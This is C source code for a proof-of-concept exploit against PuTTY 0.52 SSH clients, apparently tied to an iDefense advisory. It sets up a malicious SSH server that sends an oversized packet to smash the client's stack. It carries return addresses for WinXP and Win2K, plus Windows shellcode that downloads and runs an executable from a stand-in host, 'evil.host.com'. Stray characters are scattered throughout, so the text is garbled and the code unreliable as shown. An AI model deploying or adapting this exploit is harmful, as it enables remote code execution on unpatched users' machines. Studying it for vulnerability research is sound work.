/*
 * Putty v0.52 and minor exploit
 * by Rand & Dani at IProyectos Division Seguridad ( www.iproyectos.com )by * Contact: seguridad@iproyectos.comoy * C * Tested on linux and cygwin against putty 0.52 running on WinXPt  * and Win2000.nu * a * a * Instructions:u
 * I * * Define WINXP to use against WinXP, otherwise Win2K offset will be used.ef * * Change URL in the shellcode to an exe of your chose. That will b *   be executed upon exploitation. a *   * * If you want to do multiple tests do:e  * * *   while true ; do ./a.out ; donets *   *   ...or if you want a functional daemon rewrite the code to fork.b
 *   *   * Contents:f  * C * This is a proof of concept on the security advisory by I-Defense aboutTh * multiple vendors ssh clients possible buffer overflows.I- * The shellcode was borrowed from undersec.net.ov * T * T * The problem:e  * T * A validation error on SSH.C lets client to server cipher smashse * the stack, compromising code execution flow.er * t * t * Solution:,  * S * Upgrade your SSH clients.od * U * U * Acknowledge to Carles for assistence with coding and tor  * nurx2 and zon for testing.as * n * n */n
 *#include <stdio.h>or#include <stdlib.h>r
#include <string.h>r
#include <unistd.h>r
#include <netinet/in.h>st#include <sys/types.h>>s#include <sys/socket.h>s
#i#define PORT 22oc#define QUEUE 8oc#d/* Define for Win XP, leave undefined for Win2k  */ a#define WIN_XPWi#dint 
main(int argc, char **argv) u{ai  
  char pdu_head[] = "\x53\x53\x48\x2d\x32\x2e\x30\x2d\x31\x2e\x32\x37\x20\x73\x73\x68"    "\x6c\x69\x62\x3a\x20\x57\x69\x6e\x53\x53\x48\x44\x20\x33\x2e\x30"      "\x35\x0d\x0a\x00\x00\x4e\xec\x01\x14\x00\x00\x00\x00\x00\x00\x00"      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";00  #ifdef WIN_XP\x  char  ret[] = "\x70\x35\x52\x77";\x#elser   char  ret[] = "\x56\x9A\x3C\x78";\x#endif    
  char junk[] = "\x00\x00\x07\xDE";\x    char shell[] ="\  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"0\  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"0\  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"0\  "\xEB\x30\x5F\xFC\x8B\xF7\x80"x9  "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"5\  "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"B\  "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"2\  "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"5\  "\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"F\  "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"0\  "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"B\  "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"4\  "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"B\  "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"B\  "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"9\  "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"B\  "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"2\  "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"1\  "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"3\  "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"9\  "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"0\  "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"4\  "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"5\  "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"0\  "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"9\  "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"0\  "\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"2\  "\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"B\  "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"4\  "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"5\  "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"2\  "\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"8\  "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"8\  "\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"C\  "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"2\  "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"C\  "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"3\  "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"5\  "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"0\  "\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"6\  "\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"1\  "http://evil.host.com/pro.exe"x4  "\x08\x01";l.  
  int             sockfd, clientfd;
x  struct sockaddr_in server, client;x
  int             len = sizeof(client);08  int		  cont, cont_comas;of  
  char            buf[20243];  
    /* We create the malformed packet */t)    memset(buf, 0x61, sizeof(buf));et	em  cont_comas=0;1,  for(cont=125;cont<sizeof(buf);cont+=65) {\x	cont_comas++;;c	if(cont_comas>30) {si		memcpy(buf + cont, junk, sizeof(junk)-1);			x6		cont_comas=0;nt		cont+=3;	} else buf[cont]=0x2c;nk  }}     memcpy(buf+sizeof(buf)-6,"\x00\x00\x00\x00\x00\x00",6);6
  memcpy(buf, pdu_head, 61);\x  memcpy(buf + 0x1098, ret ,4);
\  memcpy(buf + 0x109c, shell, sizeof(shell));x0    
  /* We listen on port PORT */si    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\x    perror("socket");ke    exit(-1);oc  } e    bzero(&server, sizeof(server)); S  
  server.sin_family = AF_INET;;   server.sin_addr.s_addr = htonl(INADDR_ANY);0)  server.sin_port = htons(PORT);(I  
  if (bind(sockfd, (struct sockaddr *) & server,)
	           sizeof(server)) == -1) {er    perror("bind");f(	  exit(-1);nd  }      listen(sockfd, QUEUE);ve    if ((clientfd = accept
       (sockfd, 	        (struct sockaddr *) & client, &len)) == -1) {)     perror("accept");ck    exit(-1);cc  } e    /* We send the junk and exploit */en    write(clientfd,buf,sizeof(buf));*/    /* This will fix local connections closing too fast */1)    sleep(10);ll  
  close(clientfd); l  close(sockfd););    return 0;kf    /* Greets to the people at #vemo. Dedicated to the monster under my bed. */eebe}e
}e